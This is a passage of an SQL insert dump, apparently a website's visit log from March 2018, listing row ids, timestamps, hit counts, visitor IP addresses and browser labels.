'185.189.112.157','other'),(226555,1522203734,1,1,0,0,'66.249.64.28','chrome'),(226556,1522203881,1,1,0,0,'141.8.142.74','other'),(226557,1522204924,1,1,0,0,'216.244.66.194','other'),(226558,1522205003,1,0,1,0,'66.249.64.29',''),(226559,1522206002,1,1,0,0,'141.8.142.74','other'),(226560,1522206942,1,1,0,0,'178.255.215.94','other'),(226561,1522207455,2,2,0,0,'95.133.238.23','chrome'),(226562,1522207631,1,1,0,0,'207.46.13.56','other'),(226563,1522208802,1,0,1,0,'66.249.70.25',''),(226564,1522208815,1,1,0,0,'178.154.171.88','other'),(226565,1522210003,1,1,0,0,'216.244.66.194','other'),(226566,1522210094,1,1,0,0,'178.154.171.10','other'),(226567,1522210333,1,1,0,0,'216.244.66.237','other'),(226568,1522210588,1,0,1,0,'66.249.64.29',''),(226569,1522211626,1,1,0,0,'141.8.142.74','other'),(226570,1522212802,1,1,0,0,'91.196.178.51','chrome'),(226571,1522213643,1,1,0,0,'216.244.66.237','other'),(226572,1522213812,7,7,0,0,'88.198.55.175','other'),(226573,1522214137,1,1,0,0,'8.29.198.25','other'),(226574,1522214925,1,1,0,0,'77.111.244.14','chrome'),(226576,1522215152,3,3,0,0,'216.244.66.237','other'),(226577,1522215284,1,0,1,0,'66.249.70.27',''),(226578,1522215955,1,1,0,0,'91.196.178.51','chrome'),(226579,1522216112,1,1,0,0,'216.244.66.237','other'),(226580,1522217715,1,1,0,0,'95.135.179.153','chrome'),(226581,1522217842,2,2,0,0,'91.196.178.164','chrome'),(226582,1522218211,4,4,0,0,'216.244.66.237','other'),(226583,1522218743,1,1,0,0,'216.244.66.246','other'),(226584,1522219779,4,4,0,0,'216.244.66.237','other'),(226585,1522219923,2,2,0,0,'195.230.119.59','chrome'),(226586,1522220457,1,1,0,0,'141.8.142.74','other'),(226587,1522220562,2,2,0,0,'91.196.178.21','chrome'),(226588,1522221071,1,1,0,0,'216.244.66.237','other'),(226589,1522221492,2,2,0,0,'141.8.142.74','other'),(226590,1522221573,1,1,0,0,'91.196.179.138','chrome'),(226591,1522221896,1,1,0,0,'77.111.244.27','chrome'),(226592,1522222265,2,2,0,0,'91.196.178.101','chrome'),(226593,1522222579,2,2,0,0,'195.10.210.70','chrome'),(226594,1522222804,1,1,0,0,'93.73.171.3','firefox'),(226595,1522223102,2,2,0,0,'178.151.245.174','other'),(226596,1522223153,1,1,0,0,'216.244.66.246','other'),(226597,1522223450,1,1,0,0,'91.196.178.101','chrome'),(226598,1522224183,1,1,0,0,'91.196.178.130','chrome'),(226599,1522224385,1,1,0,0,'91.196.179.138','chrome'),(226600,1522224457,1,1,0,0,'91.196.178.169','chrome'),(226601,1522224639,1,1,0,0,'216.244.66.237','other'),(226602,1522224794,1,1,0,0,'91.196.178.101','chrome'),(226603,1522224887,1,1,0,0,'188.230.43.254','other'),(226604,1522224976,1,1,0,0,'8.29.198.27','other'),(226605,1522225277,2,2,0,0,'141.8.142.74','other'),(226606,1522225313,1,1,0,0,'91.196.179.138','chrome'),(226607,1522225683,1,1,0,0,'198.37.118.9','firefox'),(226608,1522226095,2,2,0,0,'216.244.66.237','other'),(226609,1522227405,1,1,0,0,'91.196.178.101','chrome'),(226610,1522227828,1,1,0,0,'87.250.224.46','other'),(226611,1522228216,1,1,0,0,'216.244.66.194','other'),(226612,1522228239,2,2,0,0,'91.196.178.21','chrome'),(226613,1522229019,1,1,0,0,'87.250.224.46','other'),(226614,1522229191,1,1,0,0,'91.196.178.21','chrome'),(226615,1522229235,1,1,0,0,'188.255.104.175','msie'),(226616,1522229350,1,1,0,0,'95.135.213.166','chrome'),(226617,1522229455,2,2,0,0,'216.244.66.246','other'),(226618,1522229803,2,2,0,0,'130.180.218.34','chrome'),(226619,1522230268,1,1,0,0,'77.111.244.34','chrome'),(226620,1522230278,1,1,0,0,'87.250.224.46','other'),(226621,1522230481,1,1,0,0,'77.111.244.69','chrome'),(226622,1522230528,1,1,0,0,'141.8.142.74','other'),(226623,1522230569,1,1,0,0,'77.111.244.28','chrome'),(226624,1522230573,1,1,0,0,'91.196.178.21','chrome'),(226625,1522230651,1,1,0,0,'77.111.244.48','chrome'),(226626,1522231054,1,1,0,0,'37.54.2.60','chrome'),(226627,1522231209,2,2,0,0,'77.111.244.14','chrome'),(226628,1522232089,1,1,0,0,'207.46.13.56','other'),(226629,1522232182,1,1,0,0,'35.226.23.240','other'),(226630,1522232623,1,0,1,0,'66.249.64.30',''),(226631,1522232750,1,1,0,0,'94.153.233.234','chrome'),(226632,1522232855,1,1,0,0,'141.8.142.74','other'),(226633,1522233449,1,1,0,0,'188.163.19.116','chrome'),(226634,1522233892,1,1,0,0,'157.55.39.70','other'),(226635,1522234947,1,1,0,0,'107.167.109.165','chrome'),(226636,1522235209,1,1,0,0,'141.8.142.74','other'),(226637,1522235621,1,1,0,0,'216.244.66.246','other'),(226638,1522235816,1,1,0,0,'8.29.198.27','other'),(226639,1522235954,1,1,0,0,'91.196.178.51','chrome'),(226640,1522236037,1,1,0,0,'193.186.9.95','chrome'),(226641,1522236205,1,1,0,0,'178.154.171.88','other'),(226642,1522236405,1,1,0,0,'91.196.177.8','chrome'),(226643,1522236542,1,1,0,0,'91.196.177.46','chrome'),(226644,1522237084,1,1,0,0,'91.196.178.77','chrome'),(226645,1522237124,1,1,0,0,'216.244.66.237','other'),(226646,1522237125,1,1,0,0,'95.132.40.120','chrome'),(226647,1522237204,1,1,0,0,'141.8.142.74','other'),(226648,1522237329,1,1,0,0,'178.154.171.88','other'),(226649,1522238731,1,1,0,0,'91.196.178.163','chrome'),(226650,1522239117,1,1,0,0,'141.8.142.74','other'),(226651,1522239529,2,2,0,0,'91.196.178.165','chrome'),(226652,1522240214,1,1,0,0,'188.230.43.254','other'),(226653,1522240318,1,1,0,0,'37.52.18.88','chrome'),(226654,1522240771,2,2,0,0,'141.8.142.74','other'),(226655,1522241042,2,2,0,0,'91.196.178.22','chrome'),(226656,1522241487,1,1,0,0,'178.154.171.88','other'),(226657,1522241511,2,2,0,0,'216.244.66.246','other'),(226658,1522242009,1,1,0,0,'78.27.185.36','chrome'),(226659,1522242416,1,1,0,0,'91.124.182.170','firefox'),(226660,1522242645,1,1,0,0,'188.230.43.254','other'),(226661,1522242785,1,1,0,0,'82.207.121.233','firefox'),(226662,1522242928,3,3,0,0,'77.111.244.36','chrome'),(226663,1522243137,1,1,0,0,'216.244.66.237','other'),(226664,1522243157,1,0,1,0,'66.249.64.30',''),(226665,1522243302,2,2,0,0,'91.196.178.77','chrome'),(226666,1522243489,1,0,1,0,'66.249.70.25',''),(226667,1522243680,1,1,0,0,'95.132.40.165','firefox'),(226668,1522243691,1,1,0,0,'180.76.15.148','other'),(226669,1522243737,1,1,0,0,'91.196.178.73','chrome'),(226670,1522244706,2,2,0,0,'216.244.66.237','other'),(226671,1522245013,1,1,0,0,'188.230.43.254','other'),(226672,1522245425,1,1,0,0,'178.154.171.88','other'),(226673,1522245525,1,1,0,0,'198.37.118.9','firefox'),(226674,1522245600,1,1,0,0,'66.249.64.30','chrome'),(226675,1522245750,1,0,1,0,'66.249.70.29',''),(226676,1522246263,1,1,0,0,'216.244.66.237','other'),(226677,1522246651,1,1,0,0,'8.29.198.25','other'),(226678,1522246982,2,2,0,0,'178.154.200.41','other'),(226679,1522247011,1,1,0,0,'216.244.66.194','other'),(226680,1522247412,1,1,0,0,'188.230.43.254','other'),(226681,1522247576,1,1,0,0,'216.244.66.246','other'),(226682,1522247688,1,1,0,0,'141.8.142.74','other'),(226683,1522247778,1,1,0,0,'178.154.171.88','other'),(226684,1522248849,1,1,0,0,'91.124.218.122','firefox'),(226685,1522249127,1,1,0,0,'66.249.64.29','chrome'),(226686,1522249245,1,1,0,0,'91.196.178.67','firefox'),(226687,1522249811,1,1,0,0,'188.230.43.254','other'),(226688,1522250053,1,0,1,0,'66.249.64.30',''),(226689,1522251664,1,1,0,0,'163.172.255.139','chrome'),(226690,1522251841,2,2,0,0,'178.154.171.88','other'),(226691,1522252212,1,1,0,0,'188.230.43.254','other'),(226692,1522252620,3,3,0,0,'77.111.244.23','chrome'),(226693,1522253316,1,1,0,0,'147.135.128.113','other'),(226694,1522253950,1,1,0,0,'91.233.48.238','chrome'),(226695,1522254577,2,2,0,0,'91.196.178.21','chrome'),(226696,1522254616,1,1,0,0,'188.230.43.254','other'),(226697,1522255121,6,6,0,0,'141.8.142.74','other'),(226698,1522255447,1,1,0,0,'87.250.224.46','other'),(226699,1522255497,1,1,0,0,'95.132.60.166','chrome'),(226700,1522255577,1,1,0,0,'178.154.171.88','other'),(226701,1522256323,1,1,0,0,'66.249.64.28','chrome'),(226702,1522256705,1,1,0,0,'216.244.66.194','other'),(226703,1522256949,1,1,0,0,'141.8.142.74','other'),(226704,1522257123,1,1,0,0,'85.114.213.59','chrome'),(226705,1522257496,1,1,0,0,'8.29.198.26','other'),(226706,1522257666,1,1,0,0,'91.196.178.21','chrome'),(226707,1522258637,1,1,0,0,'216.244.66.246','other'),(226708,1522258694,2,2,0,0,'95.133.238.23','chrome'),(226709,1522259082,1,1,0,0,'79.182.32.238','chrome'),(226710,1522259235,1,1,0,0,'141.8.142.74','other'),(226711,1522259703,1,1,0,0,'91.196.178.21','chrome'),(226712,1522260031,1,1,0,0,'95.134.203.155','chrome'),(226713,1522260151,1,1,0,0,'141.8.142.74','other'),(226714,1522261118,1,1,0,0,'178.154.171.88','other'),(226715,1522261802,2,2,0,0,'37.73.243.235','chrome'),(226716,1522261941,2,2,0,0,'37.54.114.62','chrome'),(226717,1522262112,1,1,0,0,'37.53.138.230','chrome'),(226718,1522262797,1,1,0,0,'188.163.32.31','chrome'),(226719,1522262908,1,1,0,0,'178.154.171.88','other'),(226720,1522263193,1,1,0,0,'141.8.142.74','other'),(226721,1522264007,2,2,0,0,'91.196.178.21','chrome'),(226722,1522264118,6,6,0,0,'54.37.149.75','other'),(226723,1522264708,1,0,1,0,'66.249.64.29',''),(226724,1522264766,2,2,0,0,'178.154.171.88','other'),(226725,1522265197,3,3,0,0,'141.8.142.74','other'),(226726,1522266455,1,1,0,0,'141.8.142.74','other'),(226727,1522267638,1,1,0,0,'141.8.142.74','other'),(226728,1522268322,1,1,0,0,'8.29.198.27','other'),(226729,1522269030,1,1,0,0,'216.244.66.237','other'),(226730,1522269513,1,1,0,0,'66.249.64.30','chrome'),(226731,1522270715,1,1,0,0,'216.244.66.246','other'),(226732,1522270928,1,1,0,0,'66.249.70.29','chrome'),(226733,1522272060,1,1,0,0,'141.8.142.74','other'),(226734,1522272978,1,1,0,0,'141.8.132.19','other'),(226735,1522272982,1,1,0,0,'178.154.171.88','other'),(226736,1522273795,1,1,0,0,'178.154.200.7','other'),(226737,1522275316,1,1,0,0,'216.244.66.237','other'),(226738,1522277204,1,1,0,0,'91.209.11.236','other'),(226739,1522277696,1,0,1,0,'66.249.64.28',''),(226740,1522277712,1,1,0,0,'141.8.142.74','other'),(226741,1522278658,1,1,0,0,'37.112.235.167','chrome'),(226742,1522279165,1,1,0,0,'8.29.198.27','other'),(226743,1522279479,1,0,1,0,'66.249.64.30',''),(226744,1522279599,3,3,0,0,'130.180.220.179','chrome'),(226745,1522280177,2,2,0,0,'216.244.66.194','other'),(226746,1522280973,1,0,1,0,'66.249.64.28',''),(226747,1522281653,1,1,0,0,'178.154.171.88','other'),(226748,1522282685,1,1,0,0,'216.244.66.246','other'),(226749,1522284573,2,2,0,0,'216.244.66.237','other'),(226750,1522285576,1,1,0,0,'141.8.142.74','other'),(226751,1522286743,1,1,0,0,'87.250.224.46','other'),(226752,1522287766,6,6,0,0,'216.244.66.237','other'),(226753,1522288129,1,1,0,0,'37.9.113.182','other'),(226754,1522288838,1,1,0,0,'178.154.171.88','other'),(226755,1522289467,2,2,0,0,'216.244.66.237','other'),(226756,1522289590,1,0,1,0,'66.249.64.28',''),(226757,1522289608,2,1,1,0,'66.249.70.25',''),(226758,1522289731,1,1,0,0,'66.249.64.29','chrome'),(226759,1522289892,1,1,0,0,'216.244.66.246','other'),(226760,1522289999,1,1,0,0,'8.29.198.26','other'),(226761,1522290849,1,1,0,0,'91.196.178.88','firefox'),(226762,1522291010,2,2,0,0,'141.8.142.74','other'),(226763,1522291349,1,0,1,0,'66.249.64.29',''),(226764,1522292055,1,1,0,0,'178.154.171.88','other'),(226765,1522292095,1,1,0,0,'87.250.224.46','other'),(226766,1522292292,5,5,0,0,'216.244.66.237','other'),(226767,1522292312,1,1,0,0,'141.8.142.74','other'),(226768,1522292385,1,1,0,0,'46.242.127.102','msie'),(226769,1522292979,1,0,1,0,'66.249.64.30',''),(226770,1522293748,1,1,0,0,'178.154.171.88','other'),(226771,1522293832,1,1,0,0,'66.249.64.28','chrome'),(226772,1522294305,2,2,0,0,'69.30.210.242','other'),(226773,1522295032,1,1,0,0,'141.8.142.74','other'),(226774,1522295147,1,1,0,0,'40.77.167.151','other'),(226775,1522295210,1,1,0,0,'37.73.219.18','chrome'),(226776,1522296467,1,1,0,0,'178.154.200.41','other'),(226777,1522296545,1,0,1,0,'66.249.64.28',''),(226778,1522296694,1,1,0,0,'141.8.142.74','other'),(226779,1522296760,1,1,0,0,'80.252.155.198','chrome'),(226780,1522296998,3,3,0,0,'216.244.66.237','other'),(226781,1522297204,1,1,0,0,'216.244.66.246','other'),(226782,1522298660,2,2,0,0,'216.244.66.237','other'),(226783,1522299539,1,1,0,0,'37.9.113.110','other'),(226784,1522300243,1,1,0,0,'216.244.66.237','other'),(226785,1522300369,1,0,1,0,'66.249.70.25',''),(226786,1522300717,2,2,0,0,'141.8.142.74','other'),(226787,1522300839,1,1,0,0,'8.29.198.25','other'),(226788,1522301365,1,1,0,0,'77.111.244.34','chrome'),(226790,1522301800,2,2,0,0,'216.244.66.237','other'),(226791,1522301859,1,1,0,0,'207.46.13.139','other'),(226792,1522301924,1,1,0,0,'141.8.142.74','other'),(226793,1522302385,1,1,0,0,'54.67.59.131','chrome'),(226794,1522302425,1,1,0,0,'178.93.44.56','chrome'),(226795,1522303201,5,5,0,0,'216.244.66.237','other'),(226796,1522304222,1,1,0,0,'91.196.179.25','chrome'),(226797,1522304240,1,1,0,0,'167.114.219.41','other'),(226798,1522304476,1,1,0,0,'95.132.14.96','chrome'),(226799,1522304694,1,1,0,0,'141.8.142.74','other'),(226800,1522304889,1,1,0,0,'194.37.248.11','chrome'),(226801,1522304987,2,2,0,0,'216.244.66.237','other'),(226802,1522305038,1,1,0,0,'130.180.219.186','chrome'),(226803,1522305143,2,2,0,0,'216.244.66.194','other'),(226804,1522306017,69,0,69,0,'50.234.200.6',''),(226805,1522306518,1,1,0,0,'216.244.66.237','other'),(226806,1522306837,1,1,0,0,'178.154.171.88','other'),(226807,1522307059,2,2,0,0,'91.196.178.86','chrome'),(226808,1522307264,2,2,0,0,'195.230.119.59','chrome'),(226809,1522307683,1,1,0,0,'195.191.104.254','chrome'),(226810,1522308227,3,3,0,0,'91.196.178.22','chrome'),(226811,1522308506,2,2,0,0,'91.196.178.77','chrome'),(226812,1522309357,1,1,0,0,'216.244.66.194','other'),(226813,1522309409,2,2,0,0,'216.244.66.237','other'),(226814,1522309913,2,2,0,0,'178.154.171.88','other'),(226815,1522310022,1,1,0,0,'46.133.202.171','other'),(226816,1522310739,1,1,0,0,'178.216.188.252','chrome'),(226817,1522310756,1,1,0,0,'82.207.121.233','chrome'),(226818,1522310834,1,1,0,0,'91.244.44.74','chrome'),(226819,1522311276,1,1,0,0,'5.83.17.173','chrome'),(226820,1522311316,1,0,1,0,'66.249.64.30',''),(226821,1522311672,1,1,0,0,'8.29.198.27','other'),(226822,1522311941,1,1,0,0,'77.111.244.47','chrome'),(226823,1522312048,1,1,0,0,'212.1.101.121','firefox'),(226824,1522312182,2,2,0,0,'91.196.178.77','chrome'),(226825,1522312764,1,1,0,0,'178.154.171.88','other'),(226826,1522313556,1,1,0,0,'91.196.178.103','firefox'),(226827,1522314256,1,1,0,0,'178.154.171.10','other'),(226828,1522314547,1,1,0,0,'207.46.13.56','other'),(226829,1522314574,1,1,0,0,'46.211.104.155','chrome'),(226830,1522315009,1,1,0,0,'91.124.182.170','firefox'),(226831,1522315170,1,1,0,0,'216.244.66.194','other'),(226832,1522315495,1,1,0,0,'87.250.224.46','other'),(226833,1522315551,1,1,0,0,'178.92.171.218','firefox'),(226834,1522315859,1,1,0,0,'217.182.203.54','chrome'),(226835,1522316004,1,1,0,0,'37.9.113.182','other'),(226836,1522316178,1,1,0,0,'141.8.132.22','other'),(226837,1522316382,2,2,0,0,'216.244.66.194','other'),(226838,1522317138,2,2,0,0,'78.111.190.43','chrome'),(226839,1522317522,1,1,0,0,'216.244.66.237','other'),(226840,1522318410,1,1,0,0,'204.79.180.14','msie'),(226841,1522318465,1,1,0,0,'37.55.68.36','chrome'),(226842,1522318974,1,1,0,0,'80.254.150.79','chrome'),(226843,1522319325,1,1,0,0,'178.154.171.60','other'),(226844,1522319793,1,1,0,0,'91.209.11.236','other'),(226845,1522321174,1,1,0,0,'207.46.13.56','other'),(226846,1522321376,1,1,0,0,'213.180.203.7','other'),(226847,1522321771,1,1,0,0,'216.244.66.237','other'),(226848,1522322001,1,0,1,0,'66.249.64.30',''),(226849,1522322532,1,1,0,0,'8.29.198.27','other'),(226850,1522323537,2,2,0,0,'91.196.178.22','chrome'),(226851,1522323576,1,1,0,0,'37.53.110.219','chrome'),(226852,1522323776,1,1,0,0,'178.154.200.41','other'),(226853,1522323778,1,1,0,0,'37.9.113.110','other'),(226854,1522323942,1,1,0,0,'207.46.13.26','other'),(226855,1522324258,3,3,0,0,'77.111.244.47','chrome'),(226856,1522324409,1,1,0,0,'35.226.23.240','other'),(226857,1522324599,1,1,0,0,'180.76.15.149','other'),(226858,1522325402,1,1,0,0,'178.95.236.17','chrome'),(226859,1522326253,2,2,0,0,'91.196.177.46','chrome'),(226860,1522327109,1,1,0,0,'91.196.178.101','chrome'),(226861,1522327815,1,0,1,0,'66.249.70.29',''),(226862,1522328338,1,1,0,0,'95.132.30.115','firefox'),(226863,1522328345,1,1,0,0,'80.252.154.233','chrome'),(226864,1522328800,1,1,0,0,'193.202.118.164','firefox'),(226865,1522329250,1,1,0,0,'176.241.150.252','firefox'),(226866,1522329650,1,1,0,0,'91.196.178.75','firefox'),(226867,1522331246,1,1,0,0,'141.8.142.74','other'),(226868,1522331322,8,8,0,0,'91.196.178.77','chrome'),(226869,1522331366,1,1,0,0,'40.77.167.151','other'),(226870,1522331508,2,2,0,0,'91.124.182.170','firefox'),(226871,1522332154,1,1,0,0,'91.196.178.163','chrome'),(226872,1522332410,1,1,0,0,'91.124.182.170','firefox'),(226873,1522332621,3,3,0,0,'62.210.101.104','other'),(226874,1522332764,1,1,0,0,'212.90.183.78','chrome'),(226875,1522332802,1,1,0,0,'193.34.219.72','other'),(226876,1522332808,1,1,0,0,'188.230.43.254','other'),(226877,1522333360,1,1,0,0,'141.8.142.74','other'),(226878,1522333369,1,1,0,0,'8.29.198.26','other'),(226879,1522335194,2,2,0,0,'216.244.66.246','other'),(226880,1522335335,1,1,0,0,'178.154.171.88','other'),(226881,1522335441,1,1,0,0,'54.165.59.7','other'),(226882,1522336253,1,1,0,0,'188.230.43.254','other'),(226883,1522336447,2,2,0,0,'194.143.144.18','chrome'),(226884,1522337101,1,1,0,0,'207.46.13.56','other'),(226885,1522337456,1,1,0,0,'91.196.178.132','chrome'),(226886,1522338156,1,1,0,0,'95.134.2.102','chrome'),(226887,1522338497,1,1,0,0,'194.143.144.18','chrome'),(226888,1522338590,1,1,0,0,'188.230.43.254','other'),(226889,1522340326,2,2,0,0,'95.133.238.46','chrome'),(226890,1522340451,1,1,0,0,'188.230.43.254','other'),(226891,1522342084,1,1,0,0,'95.132.57.54','chrome'),(226892,1522342518,2,2,0,0,'216.244.66.246','other'),(226893,1522342667,2,2,0,0,'141.8.142.74','other'),(226894,1522342850,1,1,0,0,'188.230.43.254','other'),(226895,1522342967,2,2,0,0,'178.154.171.88','other'),(226896,1522344115,1,1,0,0,'54.165.59.7','other'),(226897,1522344142,1,1,0,0,'207.46.13.139','other'),(226898,1522344211,1,1,0,0,'8.29.198.25','other'),(226899,1522344286,1,1,0,0,'178.154.200.41','other'),(226900,1522345066,1,1,0,0,'178.154.171.88','other'),(226901,1522346766,3,3,0,0,'216.244.66.237','other'),(226902,1522347866,2,2,0,0,'141.8.142.74','other'),(226903,1522348383,1,1,0,0,'46.201.113.44','chrome'),(226904,1522348918,3,3,0,0,'141.8.142.74','other'),(226905,1522349665,2,2,0,0,'178.154.171.88','other'),(226906,1522349972,1,1,0,0,'40.77.167.151','other'),(226907,1522350023,2,2,0,0,'216.244.66.237','other'),(226908,1522350118,1,0,1,0,'66.249.69.145',''),(226909,1522350129,2,0,2,0,'66.249.64.28',''),(226910,1522350253,3,3,0,0,'91.196.178.165','chrome'),(226911,1522350736,1,1,0,0,'37.9.113.151','other'),(226912,1522350943,1,1,0,0,'178.154.171.88','other'),(226913,1522350963,1,1,0,0,'37.9.113.114','other'),(226914,1522351403,3,3,0,0,'216.244.66.237','other'),(226915,1522352169,1,1,0,0,'5.45.207.58','other'),(226916,1522352947,1,1,0,0,'141.8.142.74','other'),(226917,1522353015,1,1,0,0,'178.154.171.88','other'),(226918,1522353083,1,1,0,0,'66.249.64.28','chrome'),(226919,1522353188,1,1,0,0,'40.77.167.151','other'),(226920,1522353299,1,1,0,0,'180.76.15.14','other'),(226921,1522354950,1,1,0,0,'87.250.224.46','other'),(226922,1522355041,1,1,0,0,'8.29.198.26','other'),(226923,1522355236,3,3,0,0,'141.8.142.74','other'),(226924,1522355532,1,1,0,0,'178.154.171.88','other'),(226925,1522355581,2,2,0,0,'66.249.64.29','chrome'),(226926,1522356253,1,1,0,0,'34.207.57.33','other'),(226927,1522356260,1,1,0,0,'178.92.8.128','chrome'),(226928,1522356645,1,1,0,0,'87.250.224.46','other'),(226929,1522356648,3,3,0,0,'141.8.142.74','other'),(226930,1522357329,1,1,0,0,'34.207.57.33','other'),(226931,1522358576,1,1,0,0,'34.207.57.33','other'),(226932,1522358848,1,1,0,0,'207.46.13.26','other'),(226933,1522359137,2,2,0,0,'216.244.66.237','other'),(226934,1522359502,1,1,0,0,'34.207.57.33','other'),(226935,1522359679,1,1,0,0,'216.244.66.246','other'),(226936,1522359720,1,1,0,0,'178.154.171.88','other'),(226937,1522360579,4,4,0,0,'216.244.66.237','other'),(226938,1522360607,1,1,0,0,'34.207.57.33','other'),(226939,1522361055,2,2,0,0,'141.8.142.74','other'),(226940,1522361430,1,1,0,0,'207.46.13.26','other'),(226941,1522361795,1,1,0,0,'34.207.57.33','other'),(226942,1522362005,1,1,0,0,'178.154.171.88','other'),(226943,1522362794,1,1,0,0,'216.244.66.194','other'),(226944,1522362801,1,1,0,0,'34.207.57.33','other'),(226945,1522363223,2,2,0,0,'141.8.142.74','other'),(226946,1522363745,1,1,0,0,'34.207.57.33','other'),(226947,1522363840,1,1,0,0,'46.211.110.110','msie'),(226948,1522364470,1,0,1,0,'66.249.66.195',''),(226949,1522364708,1,1,0,0,'178.154.171.88','other'),(226950,1522364904,1,1,0,0,'34.207.57.33','other'),(226951,1522365227,1,1,0,0,'35.226.23.240','other'),(226952,1522365878,1,1,0,0,'8.29.198.27','other'),(226953,1522365965,1,1,0,0,'34.207.57.33','other'),(226954,1522366263,1,1,0,0,'216.244.66.237','other'),(226955,1522366274,1,1,0,0,'35.226.23.240','other'),(226956,1522366713,1,0,1,0,'66.249.66.199',''),(226957,1522367621,1,1,0,0,'141.8.132.19','other'),(226958,1522367985,5,5,0,0,'216.244.66.237','other'),(226959,1522368050,1,1,0,0,'207.241.232.48','other'),(226960,1522368335,1,1,0,0,'207.46.13.139','other'),(226961,1522368439,2,2,0,0,'87.250.224.39','other'),(226962,1522369364,1,1,0,0,'141.8.142.74','other'),(226963,1522369422,1,0,1,0,'66.249.66.199',''),(226964,1522369561,4,4,0,0,'216.244.66.237','other'),(226965,1522369580,1,1,0,0,'37.9.113.182','other'),(226966,1522369735,1,1,0,0,'87.250.224.46','other'),(226967,1522370355,1,0,1,0,'66.249.66.201',''),(226968,1522370537,4,4,0,0,'216.244.66.237','other'),(226969,1522370553,1,0,1,0,'66.249.66.195',''),(226970,1522371584,1,1,0,0,'178.154.171.88','other'),(226971,1522372183,1,0,1,0,'66.249.66.199',''),(226972,1522372559,2,2,0,0,'216.244.66.237','other'),(226973,1522372616,1,1,0,0,'178.154.171.88','other'),(226974,1522372735,1,0,1,0,'66.249.66.195',''),(226975,1522373031,2,2,0,0,'141.8.142.74','other'),(226976,1522374258,1,1,0,0,'216.244.66.237','other'),(226977,1522374514,1,1,0,0,'141.8.142.74','other'),(226978,1522374527,1,1,0,0,'178.154.200.41','other'),(226979,1522374967,1,1,0,0,'216.244.66.194','other'),(226980,1522375565,28,28,0,0,'69.30.205.218','other'),(226981,1522375568,1,1,0,0,'178.154.171.88','other'),(226982,1522375583,3,0,3,0,'66.249.66.199',''),(226983,1522376265,1,1,0,0,'180.76.15.139','other'),(226984,1522376293,1,1,0,0,'141.8.132.19','other'),(226985,1522376715,1,1,0,0,'8.29.198.25','other'),(226986,1522377159,1,1,0,0,'34.207.57.33','other'),(226987,1522377464,1,1,0,0,'37.9.113.151','other'),(226988,1522377466,1,1,0,0,'178.154.200.8','other'),(226989,1522377489,1,1,0,0,'178.154.200.73','other'),(226990,1522377689,1,1,0,0,'5.45.207.82','other'),(226991,1522378118,1,1,0,0,'34.207.57.33','other'),(226992,1522378494,1,0,1,0,'66.249.66.195',''),(226993,1522378921,1,1,0,0,'141.8.132.22','other'),(226994,1522378976,1,0,1,0,'66.249.66.199',''),(226995,1522379119,1,1,0,0,'34.207.57.33','other'),(226996,1522379858,1,1,0,0,'178.154.200.73','other'),(226997,1522380002,2,2,0,0,'178.154.200.59','other'),(226998,1522380011,2,2,0,0,'37.9.113.115','other'),(226999,1522380014,1,1,0,0,'213.180.203.7','other'),(227000,1522380058,1,1,0,0,'66.249.66.156','chrome'),(227001,1522380765,1,1,0,0,'34.207.57.33','other'),(227002,1522381552,1,1,0,0,'178.154.200.7','other'),(227003,1522381584,1,1,0,0,'87.250.224.46','other'),(227004,1522381804,1,1,0,0,'34.207.57.33','other'),(227005,1522381952,1,1,0,0,'216.244.66.237','other'),(227006,1522382750,1,1,0,0,'34.207.57.33','other'),(227007,1522382787,1,1,0,0,'178.154.171.88','other'),(227008,1522382877,1,1,0,0,'216.244.66.246','other'),(227009,1522383553,1,1,0,0,'213.180.203.40','other'),(227010,1522383760,1,1,0,0,'213.180.203.8','other'),(227011,1522383763,1,1,0,0,'87.250.224.85','other'),(227012,1522383827,1,1,0,0,'37.9.113.110','other'),(227013,1522383965,1,1,0,0,'34.207.57.33','other'),(227014,1522384618,1,1,0,0,'207.46.13.56','other'),(227015,1522385127,1,1,0,0,'34.207.57.33','other'),(227016,1522385236,1,1,0,0,'216.244.66.237','other'),(227017,1522386406,1,1,0,0,'34.207.57.33','other'),(227018,1522386662,1,1,0,0,'216.244.66.237','other'),(227019,1522387127,1,1,0,0,'91.196.178.73','chrome'),(227020,1522387438,1,1,0,0,'34.207.57.33','other'),(227021,1522387484,2,0,2,0,'66.249.66.156',''),(227022,1522387543,1,1,0,0,'8.29.198.25','other'),(227023,1522387575,1,1,0,0,'66.249.66.201','chrome'),(227024,1522388170,3,3,0,0,'77.111.244.36','chrome'),(227025,1522388220,2,2,0,0,'216.244.66.237','other'),(227026,1522388283,1,1,0,0,'178.154.171.88','other'),(227027,1522388578,1,1,0,0,'34.207.57.33','other'),(227028,1522388709,1,1,0,0,'91.124.219.142','firefox'),(227029,1522389066,2,2,0,0,'91.196.178.77','chrome'),(227030,1522389251,1,0,1,0,'66.249.66.201',''),(227031,1522389517,1,1,0,0,'87.250.224.46','other'),(227032,1522389521,1,1,0,0,'91.124.182.170','firefox'),(227033,1522389690,1,1,0,0,'207.46.13.56','other'),(227034,1522389695,1,1,0,0,'31.13.113.183','other'),(227035,1522389731,2,2,0,0,'216.244.66.237','other'),(227036,1522390012,1,1,0,0,'34.207.57.33','other'),(227037,1522390057,1,1,0,0,'180.76.15.14','other'),(227038,1522390659,1,0,1,0,'66.249.66.195',''),(227039,1522390969,1,0,1,0,'66.249.66.201',''),(227040,1522391041,1,1,0,0,'34.207.57.33','other'),(227041,1522391123,2,2,0,0,'91.196.178.77','chrome'),(227042,1522391334,3,3,0,0,'216.244.66.237','other'),(227043,1522391728,1,1,0,0,'54.89.27.130','other'),(227044,1522391982,1,1,0,0,'34.207.57.33','other'),(227045,1522392017,1,1,0,0,'216.244.66.246','other'),(227046,1522392184,1,0,1,0,'66.249.66.201',''),(227047,1522392332,1,1,0,0,'178.154.171.88','other'),(227048,1522392394,2,2,0,0,'130.180.218.138','chrome'),(227049,1522392630,1,1,0,0,'54.89.27.130','other'),(227050,1522392972,2,2,0,0,'141.8.142.74','other'),(227051,1522393100,1,1,0,0,'34.207.57.33','other'),(227052,1522393721,1,1,0,0,'178.154.171.88','other'),(227053,1522393885,1,0,1,0,'66.249.66.201',''),(227054,1522394074,1,1,0,0,'34.207.57.33','other'),(227055,1522394402,4,4,0,0,'216.244.66.237','other'),(227056,1522394416,2,2,0,0,'176.36.69.76','chrome'),(227057,1522395004,1,1,0,0,'34.207.57.33','other'),(227058,1522395702,2,2,0,0,'141.8.142.74','other'),(227059,1522395919,1,1,0,0,'34.207.57.33','other'),(227060,1522396975,2,2,0,0,'141.8.142.74','other'),(227061,1522397002,1,1,0,0,'34.207.57.33','other'),(227062,1522397104,1,1,0,0,'91.124.182.170','firefox'),(227063,1522397245,1,1,0,0,'62.221.41.237','chrome'),(227064,1522397921,2,2,0,0,'91.196.